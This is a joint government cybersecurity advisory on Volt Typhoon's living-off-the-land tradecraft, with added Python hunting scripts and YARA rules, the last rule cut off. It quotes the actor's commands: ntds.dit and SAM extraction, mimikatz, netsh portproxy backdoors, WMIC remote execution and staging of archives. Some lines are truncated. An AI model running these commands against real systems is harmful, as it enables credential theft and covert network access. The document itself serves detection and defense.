The United States and international cybersecurity authorities are issuing this joint Cybersecurity Advisory (CSA) to highlight a recently discovered cluster of activity of interest associated with a People’s Republic of China (PRC) state-sponsored cyber actor, also known as Volt Typhoon. Private sector partners have identified that this activity affects networks across U.S. critical infrastructure sectors, and the authoring agencies believe the actor could apply the same techniques against these and other sectors worldwide.
This advisory from the United States National Security Agency (NSA), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Federal Bureau of Investigation (FBI), the Australian Signals Directorate’s Australian Cyber Security Centre (ACSC), the Communications Security Establishment’s Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ), and the United Kingdom National Cyber Security Centre (NCSC-UK) (hereafter referred to as the “authoring agencies”) provides an overview of hunting guidance and associated best practices to detect this activity.
One of the actor’s primary tactics, techniques, and procedures (TTPs) is living off the land, which uses built-in network administration tools to perform their objectives. This TTP allows the actor to evade detection by blending in with normal Windows system and network activities, avoid endpoint detection and response (EDR) products that would alert on the introduction of third-party applications to the host, and limit the amount of activity that is captured in default logging configurations. Some of the built-in tools this actor uses are: wmic, ntdsutil, netsh, and PowerShell. The advisory provides examples of the actor’s commands along with detection signatures to aid network defenders in hunting for this activity. Many of the behavioral indicators included can also be legitimate system administration commands that appear in benign activity. Care should be taken not to assume that findings are malicious without further investigation or other indications of compromise.
Download the PDF version of this report (723 KB)
This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the Appendix: MITRE ATT&CK Techniques for all referenced tactics and techniques.
The authoring agencies are aware of recent People’s Republic of China (PRC) state-sponsored cyber activity and have identified potential indicators associated with these techniques. This advisory will help network defenders hunt for this activity on their systems. It provides many network and host artifacts associated with the activity occurring after the network has been initially compromised, with a focus on command lines used by the cyber actor. An indicators of compromise (IOC) summary is included at the end of this advisory.
Especially for living off the land techniques, it is possible that some command lines might appear on a system as the result of benign activity and would be false positive indicators of malicious activity. Defenders must evaluate matches to determine their significance, applying their knowledge of the system and baseline behavior. Additionally, if creating detection logic based on these commands, network defenders should account for variability in command string arguments, as items such as ports used may be different across environments.
The actor has leveraged compromised small office/home office (SOHO) network devices as intermediate infrastructure to obscure their activity by having much of the command and control (C2) traffic emanate from local ISPs in the geographic area of the victim. Owners of SOHO devices should ensure that network management interfaces are not exposed to the Internet to avoid them being re-purposed as redirectors by malicious actors. If they must be exposed to the Internet, device owners and operators should ensure they follow zero trust principles and maintain the highest level of authentication and access controls possible.
The actor has used Earthworm and a custom Fast Reverse Proxy (FRP) client with hardcoded C2 callbacks [T1090] to ports 8080, 8443, 8043, 8000, and 10443 with various filenames including, but not limited to:
cisco_up.exe, cl64.exe, vm3dservice.exe, watchdogd.exe, Win.exe, WmiPreSV.exe, and WmiPrvSE.exe.
The actor has executed the following command to gather information about local drives [T1082]:
cmd.exe /C "wmic path win32_logicaldisk get caption,filesystem,freespace,size,volumename"
This command does not require administrative credentials to return results. The command uses a command prompt [T1059.003] to execute a Windows Management Instrumentation Command Line (WMIC) query, collecting information about the storage devices on the local host, including drive letter, file system (e.g., new technology file system [NTFS]), free space and drive size in bytes, and an optional volume name. Windows Management Instrumentation (WMI) is a built-in Windows tool that allows a user to access management information from hosts in an enterprise environment. The command line version of WMI is called WMIC.
By default, WMI Tracing is not enabled, so the WMI commands being executed and the associated user might not be available. Additional information on WMI events and tracing can be found in the References section of the advisory.
The actor may try to exfiltrate the ntds.dit file and the SYSTEM registry hive from Windows domain controllers (DCs) out of the network to perform password cracking [T1003.003]. (The ntds.dit file is the main Active Directory (AD) database file and, by default, is stored at %SystemRoot%\NTDS\ntds.dit. This file contains information about users, groups, group memberships, and password hashes for all users in the domain; the SYSTEM registry hive contains the boot key that is used to encrypt information in the ntds.dit file.) Although the ntds.dit file is locked while in use by AD, a copy can be made by creating a Volume Shadow Copy and extracting the ntds.dit file from the Shadow Copy. The SYSTEM registry hive may also be obtained from the Shadow Copy. The following example commands show the actor creating a Shadow Copy and then extracting a copy of the ntds.dit file from it.
cmd /c vssadmin create shadow /for=C: > C:\Windows\Temp\.tmp
cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit C:\Windows\Temp > C:\Windows\Temp\.tmp
The built-in Ntdsutil.exe tool performs all these actions using a single command. There are several ways to execute Ntdsutil.exe, including running from an elevated command prompt (cmd.exe), using WMI/WMIC, or PowerShell. Defenders should look for the execution of Ntdsutil.exe commands using long, short, or a combination of the notations. For example, the long notation command activate instance ntds ifm can also be executed using the short notation ac i ntds i. Table 1 provides the long and short forms of the arguments used in the sample Ntdsutil.exe command, along with a brief description of the arguments.
Long form | Short form | Description
---|---|---
activate instance % | ac i % | Sets variable % as the active instance for ntdsutil to use
ifm | i | Install from media (ifm). Creates installation media to be used with DCPromo so the server will not need to copy data from another Domain Controller on the network
The actor has executed WMIC commands [T1047] to create a copy of the ntds.dit file and SYSTEM registry hive using ntdsutil.exe. Each of the following actor commands is a standalone example; multiple examples are provided to show how syntax and file paths may differ per environment.
wmic process call create "ntdsutil \"ac i ntds\" ifm \"create full C:\Windows\Temp\pro
wmic process call create "cmd.exe /c ntdsutil \"ac i ntds\" ifm \"create full C:\Windows\Temp\Pro\""
wmic process call create "cmd.exe /c mkdir C:\Windows\Temp\tmp & ntdsutil \"ac i ntds\" ifm \"create full C:\Windows\Temp\tmp\""
"cmd.exe" /c wmic process call create "cmd.exe /c mkdir C:\windows\Temp\McAfee_Logs & ntdsutil \"ac i ntds\" ifm \"create full C:\Windows\Temp\McAfee_Logs\""
cmd.exe /Q /c wmic process call create "cmd.exe /c mkdir C:\Windows\Temp\tmp & ntdsutil \"ac i ntds\" ifm \"create full C:\Windows\Temp\tmp\"" 1> \\127.0.0.1\ADMIN$\ 2>&1
Note: The
Each actor command above creates a copy of the ntds.dit database and the SYSTEM and SECURITY registry hives in the C:\Windows\Temp
The actor has also saved the files directly to the C:\Windows\Temp and C:\Users\Public directories, so the entirety of those directory structures should be analyzed. Ntdsutil.exe creates two subfolders in the directory specified in the command: an Active Directory folder that contains the ntds.dit and ntds.jfm files, and a registry folder that contains the SYSTEM and SECURITY hives. Defenders should look for this folder structure across their network:
Active Directory\ntds.dit
Active Directory\ntds.jfm
registry\SECURITY
registry\SYSTEM
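The long/short notation problem from Table 1 and the IFM folder layout above can be handled by one hunt routine. The following Python is an added example written for this page, not code from the advisory or the authoring agencies: it normalises ntdsutil command lines (as they appear in Security 4688 or Sysmon process-creation events, including the backslash-escaped quotes that wmic passes through) to the long notation, pulls out the destination directory, and lists the four files the export leaves behind so the hunt can pivot from the command line to the file system. The sample command lines are constructed; the `c` abbreviation for `create` rests on ntdsutil accepting unique keyword prefixes and is an assumption.

```python
import re

# Added example (not from the advisory): normalise ntdsutil IFM command lines
# across the long ("activate instance ntds") and short ("ac i ntds") notations.

# "activate instance ntds" or "ac i ntds" in either notation.
ACTIVATE_RE = re.compile(r"\b(?:ac|activate)\s+(?:i|instance)\s+ntds\b", re.IGNORECASE)
# "ifm create full <dest>" with "ifm"/"i" and "create"/"c" ("c" is an assumed
# prefix). The destination is read up to the next whitespace, so a quoted path
# containing spaces would be cut short; note that when tuning the rule.
IFM_CREATE_RE = re.compile(r"\b(?:i|ifm)\s+(?:c|create)\s+full\s+(?P<dest>\S+)", re.IGNORECASE)

# Folder layout ntdsutil creates beneath the destination (from the advisory).
IFM_ARTIFACTS = (
    r"Active Directory\ntds.dit",
    r"Active Directory\ntds.jfm",
    r"registry\SECURITY",
    r"registry\SYSTEM",
)


def analyze_ntdsutil(cmdline: str):
    """Return a finding dict for an ntdsutil IFM export, or None for anything else."""
    if "ntdsutil" not in cmdline.lower():
        return None
    # wmic carries the inner arguments with backslash-escaped quotes; flatten
    # both escaped and plain quotes to spaces so the tokens line up.
    flat = cmdline.replace('\\"', " ").replace('"', " ")
    act = ACTIVATE_RE.search(flat)
    if act is None:
        return None
    m = IFM_CREATE_RE.search(flat, act.end())
    if m is None:
        return None  # ntdsutil used, but not for an IFM export
    dest = m.group("dest").rstrip("\\")
    return {
        "destination": dest,
        "normalized": f'ntdsutil "activate instance ntds" ifm "create full {dest}"',
        "expected_artifacts": [dest + "\\" + a for a in IFM_ARTIFACTS],
    }


def hunt_ntdsutil(cmdlines):
    """Run analyze_ntdsutil over an iterable of process command lines."""
    return [f for f in (analyze_ntdsutil(c) for c in cmdlines) if f is not None]


# Constructed sample command lines modelled on the advisory's examples.
SAMPLE_CMDLINES = [
    r'wmic process call create "cmd.exe /c mkdir C:\Windows\Temp\tmp & ntdsutil \"ac i ntds\" ifm \"create full C:\Windows\Temp\tmp\""',
    r'ntdsutil "activate instance ntds" "ifm" "create full C:\Users\Public\Appfile" q q',
    r'cmd.exe /C "wmic path win32_logicaldisk get caption,filesystem,freespace,size,volumename"',
    r'ntdsutil "ac i ntds" "files" "info" q q',
]

if __name__ == "__main__":
    for finding in hunt_ntdsutil(SAMPLE_CMDLINES):
        print(finding["normalized"])
        for path in finding["expected_artifacts"]:
            print("   ", path)
```

Feed it the command-line field of exported process-creation events; every hit yields the directory to check for the `Active Directory` and `registry` subfolders, which matter when the process log has been cleared but the files were not.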
When one of the example commands is executed, several successive log entries are created in the Application log, under the ESENT Source. Associated events can be viewed in Windows Event Viewer by navigating to: Windows Logs | Application. To narrow results to relevant events, select Filter Current Log from the Actions menu on the right side of the screen. In the Event sources dropdown, check the box next to ESENT, then limit the logs to ID numbers 216, 325, 326, and 327. Clicking the OK box will apply the filters to the results.
Since ESENT logging is used extensively throughout Windows, defenders should focus on events that reference ntds.dit. If such events are present, the events’ details should contain the file path where the file copies were created. Since these files can be deleted, or enhanced logging may not be configured on hosts, the file path can greatly aid in a hunt operation. Identifying the user associated with this activity is also a critical step in a hunt operation as other actions by the compromised—or actor-created—user account can be helpful to understand additional actor TTPs, as well as the breadth of the actor's actions.
Note: If an actor can exfiltrate the ntds.dit and SYSTEM registry hive, the entire domain should be considered compromised, as the actor will generally be able to crack the password hashes for domain user accounts, create their own accounts, and/or join unauthorized systems to the domain. If this occurs, defenders should follow guidance for removing malicious actors from victim networks, such as CISA's Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/M365 Compromise.
In addition to the above TTPs used by the actor to copy the ntds.dit file, the following tools could be used by an actor to obtain the same information:
Best practices for securing ntds.dit include hardening Domain Controllers and monitoring event logs for ntdsutil.exe and similar process creations. Additionally, any use of administrator privileges should be audited and validated to confirm the legitimacy of executed commands.
The actor has used the following commands to enable port forwarding [T1090] on the host:
"cmd.exe /c "netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress= connectport=8443 protocol=tcp""
"cmd.exe /c netsh interface portproxy add v4tov4 listenport=50100 listenaddress=0.0.0.0 connectport=1433 connectaddress= "
where
Netsh is a built-in Windows command line scripting utility that can display or modify the network settings of a host, including the Windows Firewall. The portproxy add command is used to create a host:port proxy that will forward incoming connections on the provided listenaddress and listenport to the connectaddress and connectport. Administrative privileges are required to execute the portproxy command. Each portproxy command above will create a registry key in the HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp path. Defenders should look for the presence of keys in this path and investigate any anomalous entries.
Note: Using port proxies is not common for legitimate system administration since they can constitute a backdoor into the network that bypasses firewall policies. Administrators should limit port proxy usage within environments and only enable them for the period of time in which they are required.
Defenders should also use unusual IP addresses and ports in the command lines or registry entries to identify other hosts that are potentially included in actor actions. All hosts on the network should be examined for new and unusual firewall and port forwarding rules, as well as IP addresses and ports specified by the actor. If network traffic or logging is available, defenders should attempt to identify what traffic was forwarded through the port proxies to aid in the hunt operation. As previously mentioned, identifying the associated user account that made the networking changes can also aid in the hunt operation.
Firewall rule additions and changes can be viewed in Windows Event Viewer by navigating to:
Applications and Service Logs | Microsoft | Windows | Windows Firewall With Advanced Security | Firewall.
In addition to host-level changes, defenders should review perimeter firewall configurations for unauthorized changes and/or entries that may permit external connections to internal hosts. The actor is known to target perimeter devices in their operations. Firewall logs should be reviewed for any connections to systems on the ports listed in any portproxy commands discovered.
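The portproxy commands and the registry entries they leave behind describe the same listen/connect pair, so a hunt can parse both into one record and apply the same checks. The Python below is an added example for this page, not code from the advisory: it parses netsh portproxy add/delete/show command lines (argument order varies, as the advisory's two samples show), interprets values read from the PortProxy registry key, and flags proxies that listen on all interfaces or were deleted (a cleanup step the advisory lists among the actor's commands). The sample command lines and the registry value are constructed; the "<listenaddress>/<listenport>" name and "<connectaddress>/<connectport>" data layout of the registry values is how netsh stores v4tov4 entries, stated here as an assumption to confirm on a reference host.

```python
import ipaddress
import re

# Added example (not from the advisory): one record shape for portproxy command
# lines and the registry values they create.

PORTPROXY_KEY = r"HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp"

# netsh accepts key=value arguments in any order, so look each one up by name.
ARG_RE = re.compile(
    r"\b(listenaddress|listenport|connectaddress|connectport|protocol)=([^\s\"']*)",
    re.IGNORECASE)
ACTION_RE = re.compile(r"\bportproxy\s+(add|delete|show)\b", re.IGNORECASE)


def _scope(addr):
    """'private' / 'public' / 'unknown' for an address literal (or a stripped value)."""
    try:
        return "private" if ipaddress.ip_address(addr).is_private else "public"
    except ValueError:
        return "unknown"


def assess(record):
    """Attach hunt flags to a listen/connect record and return it."""
    flags = []
    if record.get("listen_addr") in ("0.0.0.0", "*"):
        flags.append("listens on all interfaces")
    if record.get("action") == "delete":
        flags.append("proxy removed; look for the earlier add and what used it")
    if record.get("connect_addr"):
        record["connect_scope"] = _scope(record["connect_addr"])
    record["flags"] = flags
    return record


def parse_portproxy_cmdline(cmdline):
    """Return a record for netsh portproxy add/delete/show lines, else None."""
    action = ACTION_RE.search(cmdline)
    if action is None:
        return None
    args = {k.lower(): v for k, v in ARG_RE.findall(cmdline)}
    return assess({
        "source": "cmdline",
        "action": action.group(1).lower(),
        "listen_addr": args.get("listenaddress"),
        "listen_port": args.get("listenport"),
        "connect_addr": args.get("connectaddress"),
        "connect_port": args.get("connectport"),
    })


def parse_portproxy_registry(value_name, value_data):
    """Interpret one value under PORTPROXY_KEY (name/data layout is an assumption)."""
    laddr, lport = value_name.split("/", 1)
    caddr, cport = value_data.split("/", 1)
    return assess({
        "source": "registry", "action": "present",
        "listen_addr": laddr, "listen_port": lport,
        "connect_addr": caddr, "connect_port": cport,
    })


# Constructed samples shaped like the advisory's command lines.
SAMPLE_CMDLINES = [
    'cmd.exe /c "netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress=10.20.30.40 connectport=8443 protocol=tcp"',
    "cmd.exe /c netsh interface portproxy add v4tov4 listenport=50100 listenaddress=0.0.0.0 connectport=1433 connectaddress=10.20.30.41",
    "netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=9999",
    "netsh interface portproxy show v4tov4",
    "netsh advfirewall show allprofiles",
]
SAMPLE_REGISTRY = [("0.0.0.0/9999", "10.20.30.40/8443")]  # (value name, value data)

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(parse_portproxy_cmdline(line))
    for name, data in SAMPLE_REGISTRY:
        print(parse_portproxy_registry(name, data))
```

On a live host the registry side is fed from `Get-ItemProperty` on the key named in `PORTPROXY_KEY`; every value there that nobody can account for is a finding, since the advisory notes that legitimate administration rarely uses port proxies at all.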
The actor has used the following PowerShell [T1059.001] command to identify successful logons to the host [T1033]:
Get-EventLog security -instanceid 4624
Note: Event ID 4624 is logged when a user successfully logs on to a host and contains useful information such as the logon type (e.g., interactive or networking), associated user and computer account names, and the logon time. Event ID 4624 entries can be viewed in Windows Event Viewer by navigating to:
Windows Logs | Security. PowerShell logs can be viewed in Event Viewer: Applications and Service Logs | Windows PowerShell.
The actor can use this command to identify which user account they are currently leveraging to access the network, identify other users logged on to the host, or identify how their actions are being logged. If the actor is using a password spray technique [T1110.003], there may be several failed logon (Event ID 4625) events for several different user accounts, followed by one or more successful logons (Event ID 4624) within a short period of time. This period may vary by actor but can range from a few seconds to a few minutes.
If the actor is using brute force password attempts [T1110] against a single user account, there may be several Event ID 4625 entries for that account, followed by a successful logon Event ID 4624. Defenders should also look for abnormal account activity, such as logons outside of normal working hours and impossible time-and-distance logons (e.g., a user logging on from two geographically separated locations at the same time).
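The two sequences just described (many accounts failing from one source before a success, or one account failing repeatedly before its success) can be checked mechanically over an export of Security events. The Python below is an added example for this page, not code from the advisory: it walks sorted 4624/4625 records, and for each successful logon looks back over the preceding failures from the same source within a time window. The thresholds and the window are assumptions to tune against the environment's baseline; the sample events are constructed.

```python
from datetime import datetime, timedelta, timezone

# Added example (not from the advisory): password-spray and brute-force
# sequences over 4624/4625 records. Thresholds are assumptions.


def detect_logon_abuse(events, window=timedelta(minutes=5), min_users=5, min_failures=5):
    """events: dicts with keys time (aware datetime), id (4624 or 4625), user, src.
    Returns findings keyed on the successful logon that ended each burst."""
    events = sorted(events, key=lambda e: e["time"])
    findings = []
    for i, ev in enumerate(events):
        if ev["id"] != 4624:
            continue
        # Failures from the same source inside the look-back window.
        fails = [f for f in events[:i]
                 if f["id"] == 4625 and f["src"] == ev["src"]
                 and ev["time"] - f["time"] <= window]
        if not fails:
            continue
        users = sorted({f["user"] for f in fails})
        if len(users) >= min_users:  # many accounts, then a success: spray
            findings.append({"pattern": "password_spray", "src": ev["src"],
                             "success_user": ev["user"], "failed_users": users,
                             "at": ev["time"]})
        own = sum(1 for f in fails if f["user"] == ev["user"])
        if own >= min_failures:  # one account hammered, then its success: brute force
            findings.append({"pattern": "brute_force", "src": ev["src"],
                             "success_user": ev["user"], "failures": own,
                             "at": ev["time"]})
    return findings


def sample_events():
    """Constructed Security log records: a spray, a brute force, and a benign typo."""
    t0 = datetime(2023, 5, 24, 19, 30, tzinfo=timezone.utc)

    def ev(offset_s, event_id, user, src):
        return {"time": t0 + timedelta(seconds=offset_s), "id": event_id,
                "user": user, "src": src}

    spray_src, brute_src, user_src = "203.0.113.5", "198.51.100.9", "10.0.0.23"
    events = [ev(i, 4625, u, spray_src)
              for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])]
    events.append(ev(8, 4624, "frank", spray_src))
    events += [ev(60 + 2 * i, 4625, "svc_backup", brute_src) for i in range(6)]
    events.append(ev(75, 4624, "svc_backup", brute_src))
    events += [ev(300, 4625, "alice", user_src), ev(310, 4624, "alice", user_src)]
    return events


if __name__ == "__main__":
    for finding in detect_logon_abuse(sample_events()):
        print(finding["pattern"], finding["src"], finding["success_user"], finding["at"].isoformat())
```

The source field is the client address from the 4625/4624 event data; when the actor comes through a compromised SOHO router in the victim's own region, as the advisory describes, that address will look local, so the sequence matters more than the geography.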
The actor regularly employs the use of Impacket’s wmiexec, which redirects output to a file within the victim host's ADMIN$ share (C:\Windows) containing an epoch timestamp in its name. The following is an example of the "dir" command being executed by wmiexec.py:
cmd.exe /Q /c *dir 1> \\127.0.0.1\ADMIN$\__1684956600.123456 2>&1
Note: Discovery of an entry similar to the example above in the Windows Event Log and/or a file with a name in a similar format may be evidence of malicious activity and should be investigated further. In the event that only a filename is discovered, the epoch timestamp within the filename reflects the time of execution by default and can be used to help scope threat hunting activities.
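Because the epoch in the file name carries the execution time, a defender can recover a timeline from either the 4688 command line or from leftover files in C:\Windows. The Python below is an added example for this page, not code from the advisory or from Impacket: it matches the `__<epoch>` pattern in a command line or a bare path, records whether the line redirects into a loopback ADMIN$ share with the quiet `cmd.exe /Q /c` form, converts the epoch to UTC, and derives the earliest and latest execution times across a set of artifacts to scope the hunt. The sample lines are constructed around the advisory's example.

```python
import re
from datetime import datetime, timezone

# Added example (not from the advisory): recover execution times from wmiexec
# output-file names in command lines or on disk.

# "__<epoch>[.fraction]" anywhere in a command line or path.
OUTPUT_FILE_RE = re.compile(r"__(?P<epoch>\d{9,10})(?:\.(?P<frac>\d+))?(?!\d)")
# stdout redirected to a UNC path ending in \ADMIN$\__ (host part is whatever precedes it).
REDIRECT_RE = re.compile(r"1>\s*\\\\[^\s\\]+\\ADMIN\$\\__", re.IGNORECASE)
QUIET_CMD_RE = re.compile(r"cmd\.exe\s+/Q\s+/c", re.IGNORECASE)


def wmiexec_indicator(text):
    """text: a process command line or a file path. Returns a finding dict or None."""
    m = OUTPUT_FILE_RE.search(text)
    if m is None:
        return None
    epoch = int(m.group("epoch"))
    return {
        "epoch": epoch,
        "executed_at": datetime.fromtimestamp(epoch, tz=timezone.utc),
        "redirect_to_admin_share": REDIRECT_RE.search(text) is not None,
        "quiet_cmd": QUIET_CMD_RE.search(text) is not None,
        "text": text,
    }


def scope_window(texts):
    """(earliest, latest) execution time across all matching artifacts, or None."""
    times = [f["executed_at"] for f in map(wmiexec_indicator, texts) if f]
    return (min(times), max(times)) if times else None


# Constructed samples: the advisory's example line, a leftover file in
# C:\Windows (the epoch value appears in the advisory's command list), and a
# benign command line.
SAMPLE = [
    r"cmd.exe /Q /c *dir 1> \\127.0.0.1\ADMIN$\__1684956600.123456 2>&1",
    r"C:\Windows\__1652470932.9400265",
    r"cmd.exe /c dir C:\Users",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(wmiexec_indicator(line))
    print(scope_window(SAMPLE))
```

When only the file survives, `scope_window` gives the interval to pull Security, PowerShell and WMI logs for; when the 4688 line survives, the `redirect_to_admin_share` and `quiet_cmd` flags together are the shape to alert on, since ordinary administration does not redirect command output into the loopback ADMIN$ share.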
The following commands were used by the actor to enumerate the network topology [T1016], the active directory structure [T1069.002], and other information about the target environment [T1069.001], [T1082]:
arp -a
curl www.ip-api.com
dnscmd . /enumrecords /zone {REDACTED}
dnscmd . /enumzones
dnscmd /enumrecords {REDACTED} . /additional
ipconfig /all
ldifde.exe -f c:\windows\temp\.txt -p subtree
net localgroup administrators
net group /dom
net group "Domain Admins" /dom
netsh interface firewall show all
netsh interface portproxy show all
netsh interface portproxy show v4tov4
netsh firewall show all
netsh portproxy show v4tov4
netstat -ano
reg query hklm\software\
systeminfo
tasklist /v
whoami
wmic volume list brief
wmic service brief
wmic product list brief
wmic baseboard list full
wevtutil qe security /rd:true /f:text /q:*[System[(EventID=4624) and TimeCreated[@SystemTime>='{REDACTED}']] and EventData[Data='{REDACTED}']]
The actor also used the following commands to identify additional opportunities for obtaining credentials in the environment [T1555], [T1003]:
dir C:\Users\{REDACTED}\.ssh\known_hosts
dir C:\users\{REDACTED}\appdata\roaming\Mozilla\firefox\profiles
mimikatz.exe
reg query hklm\software\OpenSSH
reg query hklm\software\OpenSSH\Agent
reg query hklm\software\realvnc
reg query hklm\software\realvnc\vncserver
reg query hklm\software\realvnc\Allusers
reg query hklm\software\realvnc\Allusers\vncserver
reg query hkcu\software\{REDACTED}\putty\session
reg save hklm\sam ss.dat
reg save hklm\system sy.dat
The actor executed the following additional commands:
7z.exe a -p {REDACTED} c:\windows\temp\{REDACTED}.7z
C:\Windows\system32\pcwrun.exe C:\Users\Administrator\Desktop\Win.exe
C:\Windows\System32\cmdbak.exe /c ping -n 1 127.0.0.1 > C:\Windows\temp\putty.log
C:\Windows\Temp\tmp.log
"cmd.exe" /c dir \\127.0.0.1\C$ /od
"cmd.exe" /c ping –a –n 1
"cmd.exe" /c wmic /user: /password: process call create "net stop " " > C:\Windows\Temp\tmp.log"
cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__ 2 2>&1
net use \\127.0.0.1\IPC$ /y /d
powershell start-process -filepath c:\windows\temp\.bat -windowstyle Hidden
rar.exe a –{REDACTED} c:\Windows\temp\{REDACTED} D:\{REDACTED}
wmic /node:{REDACTED} /user:{REDACTED} /password:{REDACTED} cmd /c whoami
xcopy C:\windows\temp\hp d:\{REDACTED}
The authoring agencies recommend organizations implement the mitigations below to improve their cybersecurity posture on the basis of the threat actor’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
To be able to detect the activity described in this CSA, defenders should set the audit policy for Windows security logs to include “audit process creation” and “include command line in process creation events” in addition to accessing the logs. Otherwise, the default logging configurations may not contain the necessary information.
Enabling these options creates Event ID 4688 entries in the Windows Security log that record the command line of each created process. Given the cost and difficulty of logging and analyzing this kind of activity, if an organization must limit the requirements, it should focus on enabling this kind of logging on systems that are externally facing or perform authentication or authorization, especially including domain controllers.
To hunt for the malicious WMI and PowerShell activity, defenders should also log WMI and PowerShell events. By default, WMI Tracing and deep PowerShell logging are not enabled, but they can be enabled by following the configuration instructions linked in the References section.
The actor takes measures to hide their tracks, such as clearing logs [T1070.001]. To ensure log integrity and availability, defenders should forward log files to a hardened centralized logging server, preferably on a segmented network. Such an architecture makes it harder for an actor to cover their tracks as evidence of their actions will be captured in multiple locations.
Defenders should also monitor logs for Event ID 1102, which is generated when the audit log is cleared. All Event ID 1102 entries should be investigated as logs are generally not cleared and this is a known actor tactic to cover their tracks. Even if an event log is cleared on a host, if the logs are also stored on a logging server, the copy of the log will be preserved.
This activity is often linked to malicious exploitation of edge devices and network management devices. Defenders should enable logging on their edge devices, to include system logs, to be able to identify potential exploitation and lateral movement. They should also enable network-level logging, such as sysmon, webserver, middleware, and network device logs.
File names and directory paths used in these commands are only meant to serve as examples. Actual names and paths may differ depending on environment and activity, so defenders should account for variants when performing queries.
Note: Many of the commands are derivatives of common system administration commands that could generate false positives when used alone without additional indicators.
7z.exe a -p {REDACTED} c:\windows\temp\{REDACTED}.7z c:\windows\temp\*
"C:\pstools\psexec.exe" \\{REDACTED} -s cmd /c "cmd.exe /c "netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=9999""
C:\Windows\system32\pcwrun.exe C:\Users\Administrator\Desktop\Win.exe
cmd.exe /C dir /S \\{REDACTED}\c$\Users\{REDACTED} >> c:\windows\temp\{REDACTED}.tmp
"cmd.exe" /c wmic process call create "cmd.exe /c mkdir C:\windows\Temp\McAfee_Logs & ntdsutil \"ac i ntds\" ifm \"create full C:\Windows\Temp\McAfee_Logs\""
cmd.exe /Q /c *cd 1> \\127.0.0.1\ADMIN$\__ 2>&1
cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1652470932.9400265 2>&1
cmd.exe /Q /c net group "domain admins" /dom 1>\\127.0.0.1\ADMIN$\__ 2>&1
cmd.exe /Q /c wmic process call create "cmd.exe /c mkdir C:\Windows\Temp\tmp & ntdsutil \"ac i ntds\" ifm \"create full C:\Windows\Temp\tmp\"" 1> \\127.0.0.1\ADMIN$\ 2>&1
D:\{REDACTED}
xcopy C:\windows\temp\hp d:\{REDACTED}
Get-EventLog security -instanceid 4624
ldifde.exe -f c:\windows\temp\cisco_up.txt -p subtree
makecab ..\backup210829-020000.zip ..\webapps\adssp\html\Lock.lic
move "\\ c$\users\public\Appfile\registry\SYSTEM" ..\backup210829-020000.zip
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress={REDACTED} connectport=8443 protocol=tcp
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=9999
Rar.exe a –{REDACTED} c:\Windows\temp\DMBC2C61.tmp
start-process -filepath c:\windows\temp\.bat -windowstyle hidden 1
Note: The batch file in question (
wmic process call create "cmd.exe /c mkdir C:\users\public\Appfile & ntdsutil \"ac i ntds\" ifm \"create full C:\users\public\Appfile\" q q"
wmic process call create "cmd.exe /c mkdir C:\Windows\Temp\tmp & ntdsutil \"ac i ntds\" ifm \"create full C:\Windows\Temp\tmp\""
wmic process call create "cmd.exe /c ntdsutil \"ac i ntds\" ifm \"create full C:\Windows\Temp\Pro\""
wmic process call create "ntdsutil \"ac i ntds\" ifm \"create full C:\Windows\Temp\""
Certain patterns in commands (with asterisks for wildcards) can be used to identify potentially malicious commands:
The most common paths where files and executables used by the actor have been found include:
The file names the actor has previously used for such things as malware, scripts, and tools include:
backup.bat, billagent.exe, billaudit.exe, cisco_up.exe, cl64.exe, nc.exe, rar.exe, SMSvcService.exe, update.bat, update.exe, vm3dservice.exe, watchdogd.exe, Win.exe, WmiPrvSE.exe, WmiPreSV.exe
In addition to the file names and paths above, malicious files names, believed to be randomly created, in the following format have also been discovered:
C:\Windows\[a-zA-Z]{8}.exe
In some cases, the following user-agent string (including the extra spacing) was identified performing reconnaissance activities by this actor:
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0
rule ShellJSP {
    strings:
        $s1 = "decrypt(fpath)"
        $s2 = "decrypt(fcontext)"
        $s3 = "decrypt(commandEnc)"
        $s4 = "upload failed!"
        $s5 = "aes.encrypt(allStr)"
        $s6 = "newid"
    condition:
        filesize
}

rule EncryptJSP {
    strings:
        $s1 = "AEScrypt"
        $s2 = "AES/CBC/PKCS5Padding"
        $s3 = "SecretKeySpec"
        $s4 = "FileOutputStream"
        $s5 = "getParameter"
        $s6 = "new ProcessBuilder"
        $s7 = "new BufferedReader"
        $s8 = "readLine()"
    condition:
        filesize
}

rule CustomFRPClient {
    meta:
        description = "Identify instances of the actor's custom FRP tool based on unique strings chosen by the actor and included in the tool"
    strings:
        $s1 = "%!PS-Adobe-" nocase ascii wide
        $s2 = "github.com/fatedier/frp/cmd/frpc" nocase ascii wide
        $s3 = "github.com/fatedier/frp/cmd/frpc/sub.startService" nocase ascii wide
        $s4 = "MAGA2024!!!" nocase ascii wide
        $s5 = "HTTP_PROXYHost: %s" nocase ascii wide
    condition:
        all of them
}

rule HACKTOOL_FRPClient {
    meta:
        description = "Identify instances of FRP tool (Note: This tool is known to be used by multiple actors, so hits would not necessarily imply activity by the specific actor described in this report)"
    strings:
